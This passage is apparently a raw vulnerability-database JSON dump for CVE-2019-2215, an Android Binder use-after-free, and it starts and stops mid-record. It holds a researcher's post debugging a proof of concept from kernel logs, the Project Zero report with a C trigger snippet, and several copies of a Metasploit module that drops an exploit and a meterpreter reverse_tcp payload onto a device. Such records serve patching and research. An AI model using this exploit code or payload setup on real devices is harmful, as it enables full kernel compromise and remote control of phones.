\n \n \nrcu_read_lock(); \n/* If it is cleared by POLLFREE, it should be rcu-safe */ \nwhead = rcu_dereference(pwq->whead); \nprintk(KERN_INFO \"whead before\"); \n \nif (whead) \n{ \nstrptr=&pwq->wait; \n \n \nlist_for_each_safe(p1,n1, &pwq->whead->task_list){ \nmy2 = list_entry(p1, wait_queue_t, task_list); \n \nprintk (KERN_INFO \"my2= %p %p\" ,(void*)my2->task_list.prev,(void*)my2->task_list.next); \n} \n \n \nremove_wait_queue(whead, &pwq->wait); \nprintk(KERN_INFO \"remove wait queue:%p\", (void*)&pwq->wait); \nprintk(KERN_INFO \"remove wait queue task list:%p\", (void*)&strptr->task_list); \n \nI see the list is printed.....but during Android Bootup not my PoC: \n \nDuring Android start \n \n[ 84.747753] binder_ioctl: 1878:2371 40046208 0 \n[ 84.747765] iovec str size:8 \n[ 84.747771] thread->task_list:e4fb2e30 \n[ 84.747777] proc->task_list:e57d866c \n[ 84.747784] p list= e57d866c e7fffe7c \n[ 84.747790] p list= e656de7c e57d866c \n[ 84.747797] binder_free_thread size:252 worker_off:44 \n[ 84.747804] freed thread:e4fb2e00 \n \nI see proc->task_list ... \n \nPoC: \n \n[ 642.254192] wq queue:e7ce8798 \n[ 642.254201] epoll struct:e7ce8780 \n[ 642.254214] wq queue:e7ce8f98 \n[ 642.254220] epoll struct:e7ce8f80 \n[ 642.254230] wq queue:e7ce8718 \n[ 642.254236] epoll struct:e7ce8700 \n[ 642.254266] binder_ioctl: 7392:7392 40046208 0 \n[ 642.254274] iovec str size:8 \n[ 642.254280] thread->task_list:e5389b30 \n[ 642.254286] proc->task_list:c309d86c \n[ 642.254292] binder_free_thread size:252 worker_off:44 \n[ 642.254299] freed thread:e5389b00 \n[ 642.254736] ep_unregister_pollwait struct:e7ce8780 epi struct:e51d0480 \n[ 642.254792] ep_unregister_pollwait struct:e7ce8f80 epi struct:e51d0a80 \n[ 642.254799] ep_unregister_pollwait list not empty \n[ 642.254805] whead before \n[ 642.254811] my2= c0f50cc4 c0f50cc4 \n[ 642.254817] remove wait queue:e734b994 \n[ 642.254823] remove wait queue task list:e734b9a0 \n[ 642.254830] ep_unregister_pollwait list not empty \n[ 642.254835] whead before \n[ 642.254841] my2= c0f50cd0 c0f50cd0 \n[ 642.254847] remove wait queue:e734bb24 \n[ 642.254852] remove wait queue task list:e734bb30 \n[ 642.254863] ep_free \n[ 642.254873] ep_free \n[ 642.254881] ep_free \n \nHowever bug is not triggered in my PoC. I cannot see doubly list entiries under thread and proc :/ \n \n \nHere is where the use after free bug should come in. \n \nCode: \n \nioctl(binder_fd, BINDER_THREAD_EXIT, NULL); \n \nWhen this is called, the binder_thread structure is freed in the kernel. \n \nImmediately after the parent process calls: \n \nCode: \n \nb = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ); \n \nIn the kernel, memory is allocated to copy over iovec_array from userspace. This poc depends on the pointer from this allocation, to be the same as the recently freed binder_thread memory. \n \nThen, when the child process exits, the EPOLL cleanup will use the waitqueue in the binder_thread structure, that has been overwritten with the values in iovec_array. When EPOLL cleanup unlinks the waitqueue, 0xDEADBEEF will get overwritten by a pointer in kernelspace. This has to happen just before the writev call in the parent process starts to copy over the second buffer, which gets us a kernel space memory leak. \n \nIf writev is returning 0x1000 it means the timing is off, the wait queue offset is off, the kmalloc allocation in the writev function isn't the same as the freed binder_thread, or your kernel isn't vulnerable. \n \n``` \n \n## Update 1 \n \n``` \nI narrowed it down ... so I want to replicate behavior of com.cyanogenmod.lockclock \n \nIt behaves like I want it to see: \n \ns3ve3g:/ # ps | grep 2140 \nu0_a50 2140 257 845744 36336 sys_epoll_ b4ed9114 S com.cyanogenmod.lockclock \n \nSource: \n \nhttps://github.com/LineageOS/android_packages_apps_LockClock \n \n[ 53.617686] binder_ioctl: 2140:2401 40046208 0 \n[ 53.617697] iovec str size:8 \n[ 53.617704] thread->task_list:e5b2c030 \n[ 53.617710] proc->task_list:e609206c \n[ 53.617716] p list= e609206c e50c3e7c \n[ 53.617722] p list= e50c5e7c e609206c \n[ 53.617729] binder_free_thread size:252 worker_off:44 \n[ 53.617736] freed thread:e5b2c000 \n[ 53.617755] ep_unregister_pollwait struct:e5f5c680 epi struct:e5f4c280 \n[ 53.617762] ep_unregister_pollwait list not empty \n[ 53.617768] whead before \n[ 53.617773] my2= e8b10308 e8b10308 \n[ 53.617779] remove wait queue:e5fd755c \n[ 53.617785] remove wait queue task list:e5fd7568 \n[ 53.617803] ep_free \n \nI think Binder is used here: \n \nhttps://github.com/LineageOS/android_packages_apps_LockClock/blob/5239d22272aa2b7a2bcf2c45482395da3e163289/src/org/lineageos/lockclock/DeviceStatusService.java \n \nAny idea how to replicate this using C (native) code? \n \n \n``` \n \n`\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154911/CVE-2019-2215.txt"}, {"lastseen": "2020-02-24T15:17:25", "description": "", "cvss3": {}, "published": "2020-02-24T00:00:00", "type": "packetstorm", "title": "Android Binder Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2215"], "modified": "2020-02-24T00:00:00", "id": "PACKETSTORM:156495", "href": "https://packetstormsecurity.com/files/156495/Android-Binder-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Common \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper( update_info( info, { \n'Name' => \"Android Binder Use-After-Free Exploit\", \n'Description' => %q{ \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jann Horn', # discovery and exploit \n'Maddie Stone', # discovery and exploit \n'grant-h', # Qu1ckR00t \n'timwr', # metasploit module \n], \n'References' => [ \n[ 'CVE', '2019-2215' ], \n[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ], \n[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ], \n[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ], \n], \n'DisclosureDate' => \"Sep 26 2019\", \n'SessionTypes' => [ 'meterpreter' ], \n'Platform' => [ \"android\", \"linux\" ], \n'Arch' => [ ARCH_AARCH64 ], \n'Targets' => [[ 'Auto', {} ]], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', \n'WfsDelay' => 5, \n}, \n'DefaultTarget' => 0, \n} \n)) \nend \n \ndef upload_and_chmodx(path, data) \nwrite_file path, data \nchmod(path) \nregister_file_for_cleanup(path) \nend \n \ndef exploit \nlocal_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2019-2215\", \"exploit\" ) \nexploit_data = File.read(local_file, {:mode => 'rb'}) \n \nworkingdir = session.fs.dir.getwd \nexploit_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\" \nupload_and_chmodx(exploit_file, exploit_data) \npayload_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\" \nupload_and_chmodx(payload_file, generate_payload_exe) \n \nprint_status(\"Executing exploit '#{exploit_file}'\") \nresult = cmd_exec(\"echo '#{payload_file} &' | #{exploit_file}\") \nprint_status(\"Exploit result:\\n#{result}\") \nend \nend \n \n`\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156495/binder_uaf.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:39:41", "description": "\nAndroid - Binder Driver Use-After-Free", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "exploitpack", "title": "Android - Binder Driver Use-After-Free", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-04T00:00:00", "id": "EXPLOITPACK:26D7BAD60A41B55F7B4B1D7EE2CEFA71", "href": "", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):\n\nThere is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c. \n\nAs described in the upstream commit: \n\u201cbinder_poll() passes the thread->wait waitqueue that\ncan be slept on for work. When a thread that uses\nepoll explicitly exits using BINDER_THREAD_EXIT,\nthe waitqueue is freed, but it is never removed\nfrom the corresponding epoll data structure. When\nthe process subsequently exits, the epoll cleanup\ncode tries to access the waitlist, which results in\na use-after-free.\u201d\n\nThe following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/20171213000517.GB62138@gmail.com/):\n #include <fcntl.h>\n #include <sys/epoll.h>\n #include <sys/ioctl.h>\n #include <unistd.h>\n\n #define BINDER_THREAD_EXIT 0x40046208ul\n\n int main()\n {\n int fd, epfd;\n struct epoll_event event = { .events = EPOLLIN };\n\n fd = open(\"/dev/binder0\", O_RDONLY);\n epfd = epoll_create(1000);\n epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);\n ioctl(fd, BINDER_THREAD_EXIT, NULL);\n }\n\nThis issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review. \n\nOther devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):\n1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)\n2) Huawei P20\n3) Xiaomi Redmi 5A\n4) Xiaomi Redmi Note 5\n5) Xiaomi A1\n6) Oppo A3\n7) Moto Z3\n8) Oreo LG phones (run same kernel according to website)\n9) Samsung S7, S8, S9 \n\n\n*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*\n\n\nConfirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.\n\n\nI received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:\n * It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.\n * The bug was allegedly being used or sold by the NSO Group. \n * It works on Pixel 1 and 2, but not Pixel 3 and 3a. \n * It was patched in the Linux kernel >= 4.14 without a CVE. \n * CONFIG_DEBUG_LIST breaks the primitive.\n * CONFIG_ARM64_UAO hinders exploitation.\n * The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.\n * The exploit requires little or no per-device customization.\n * A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.\n\nUsing these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time. \n\nWe do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.\n\nThe bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. \n\nI\u2019ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I\u2019ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 (google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).\n\n\nVendor statement from Android:\n\n\"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.\"\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-02T09:33:25", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "zdt", "title": "Android Binder - Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2020-02-24T00:00:00", "id": "1337DAY-ID-34015", "href": "https://0day.today/exploit/description/34015", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Common\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super( update_info( info, {\n 'Name' => \"Android Binder Use-After-Free Exploit\",\n 'Description' => %q{\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jann Horn', # discovery and exploit\n 'Maddie Stone', # discovery and exploit\n 'grant-h', # Qu1ckR00t\n 'timwr', # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2019-2215' ],\n [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],\n [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],\n [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],\n ],\n 'DisclosureDate' => \"Sep 26 2019\",\n 'SessionTypes' => [ 'meterpreter' ],\n 'Platform' => [ \"android\", \"linux\" ],\n 'Arch' => [ ARCH_AARCH64 ],\n 'Targets' => [[ 'Auto', {} ]],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',\n 'WfsDelay' => 5,\n },\n 'DefaultTarget' => 0,\n }\n ))\n end\n\n def upload_and_chmodx(path, data)\n write_file path, data\n chmod(path)\n register_file_for_cleanup(path)\n end\n\n def exploit\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2019-2215\", \"exploit\" )\n exploit_data = File.read(local_file, {:mode => 'rb'})\n\n workingdir = session.fs.dir.getwd\n exploit_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\n upload_and_chmodx(exploit_file, exploit_data)\n payload_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\n upload_and_chmodx(payload_file, generate_payload_exe)\n\n print_status(\"Executing exploit '#{exploit_file}'\")\n result = cmd_exec(\"echo '#{payload_file} &' | #{exploit_file}\")\n print_status(\"Exploit result:\\n#{result}\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/34015", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-08T14:11:56", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-04T00:00:00", "type": "zdt", "title": "Android - Binder Driver Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2019-10-04T00:00:00", "id": "1337DAY-ID-33326", "href": "https://0day.today/exploit/description/33326", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):\n\nThere is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c. \n\nAs described in the upstream commit: \n\u201cbinder_poll() passes the thread->wait waitqueue that\ncan be slept on for work. When a thread that uses\nepoll explicitly exits using BINDER_THREAD_EXIT,\nthe waitqueue is freed, but it is never removed\nfrom the corresponding epoll data structure. When\nthe process subsequently exits, the epoll cleanup\ncode tries to access the waitlist, which results in\na use-after-free.\u201d\n\nThe following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/[email\u00a0protected]/):\n #include <fcntl.h>\n #include <sys/epoll.h>\n #include <sys/ioctl.h>\n #include <unistd.h>\n\n #define BINDER_THREAD_EXIT 0x40046208ul\n\n int main()\n {\n int fd, epfd;\n struct epoll_event event = { .events = EPOLLIN };\n\n fd = open(\"/dev/binder0\", O_RDONLY);\n epfd = epoll_create(1000);\n epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);\n ioctl(fd, BINDER_THREAD_EXIT, NULL);\n }\n\nThis issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review. \n\nOther devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):\n1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)\n2) Huawei P20\n3) Xiaomi Redmi 5A\n4) Xiaomi Redmi Note 5\n5) Xiaomi A1\n6) Oppo A3\n7) Moto Z3\n8) Oreo LG phones (run same kernel according to website)\n9) Samsung S7, S8, S9 \n\n\n*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*\n\n\nConfirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.\n\n\nI received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:\n * It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.\n * The bug was allegedly being used or sold by the NSO Group. \n * It works on Pixel 1 and 2, but not Pixel 3 and 3a. \n * It was patched in the Linux kernel >= 4.14 without a CVE. \n * CONFIG_DEBUG_LIST breaks the primitive.\n * CONFIG_ARM64_UAO hinders exploitation.\n * The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.\n * The exploit requires little or no per-device customization.\n * A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.\n\nUsing these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time. \n\nWe do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.\n\nThe bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. \n\nI\u2019ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I\u2019ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 (google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).\n\n\nVendor statement from Android:\n\n\"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.\"\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip\n", "sourceHref": "https://0day.today/exploit/33326", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:18:01", "description": "A use-after-free vulnerability exists in Android Binder. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T00:00:00", "type": "checkpoint_advisories", "title": "Android Binder Use After Free (CVE-2019-2215)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2020-01-15T00:00:00", "id": "CPAI-2019-1650", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-07-24T03:20:31", "description": "This module exploits CVE-2019-2215, which is a use-after-free in Binder in the Android kernel. The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If chained with a browser renderer exploit, this bug could fully compromise a device through a malicious website. The freed memory is replaced with an iovec structure in order to leak a pointer to the task_struct. Finally the bug is triggered again in order to overwrite the addr_limit, making all memory (including kernel memory) accessible as part of the user-space memory range in our process and allowing arbitrary reading and writing of kernel memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-17T10:48:49", "type": "metasploit", "title": "Android Binder Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-02-12T21:39:12", "id": "MSF:EXPLOIT-ANDROID-LOCAL-BINDER_UAF-", "href": "https://www.rapid7.com/db/modules/exploit/android/local/binder_uaf/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Common\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => \"Android Binder Use-After-Free Exploit\",\n 'Description' => %q{\n This module exploits CVE-2019-2215, which is a use-after-free in Binder in the\n Android kernel. The bug is a local privilege escalation vulnerability that\n allows for a full compromise of a vulnerable device. If chained with a browser\n renderer exploit, this bug could fully compromise a device through a malicious\n website.\n The freed memory is replaced with an iovec structure in order to leak a pointer\n to the task_struct. Finally the bug is triggered again in order to overwrite\n the addr_limit, making all memory (including kernel memory) accessible as part\n of the user-space memory range in our process and allowing arbitrary reading\n and writing of kernel memory.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jann Horn', # discovery and exploit\n 'Maddie Stone', # discovery and exploit\n 'grant-h', # Qu1ckR00t\n 'timwr', # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2019-2215' ],\n [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],\n [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],\n [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],\n [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],\n ],\n 'DisclosureDate' => '2019-09-26',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Platform' => [ \"android\", \"linux\" ],\n 'Arch' => [ ARCH_AARCH64 ],\n 'Targets' => [[ 'Auto', {} ]],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',\n 'WfsDelay' => 5,\n },\n 'DefaultTarget' => 0,\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_fs_getwd\n ]\n }\n },\n }\n )\n )\n end\n\n def upload_and_chmodx(path, data)\n write_file path, data\n chmod(path)\n register_file_for_cleanup(path)\n end\n\n def exploit\n local_file = File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2019-2215\", \"exploit\")\n exploit_data = File.read(local_file, mode: 'rb')\n\n workingdir = session.fs.dir.getwd\n exploit_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\n upload_and_chmodx(exploit_file, exploit_data)\n payload_file = \"#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}\"\n upload_and_chmodx(payload_file, generate_payload_exe)\n\n print_status(\"Executing exploit '#{exploit_file}'\")\n result = cmd_exec(\"echo '#{payload_file} &' | #{exploit_file}\")\n print_status(\"Exploit result:\\n#{result}\")\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/android/local/binder_uaf.rb", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-06-13T18:12:03", "description": "A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 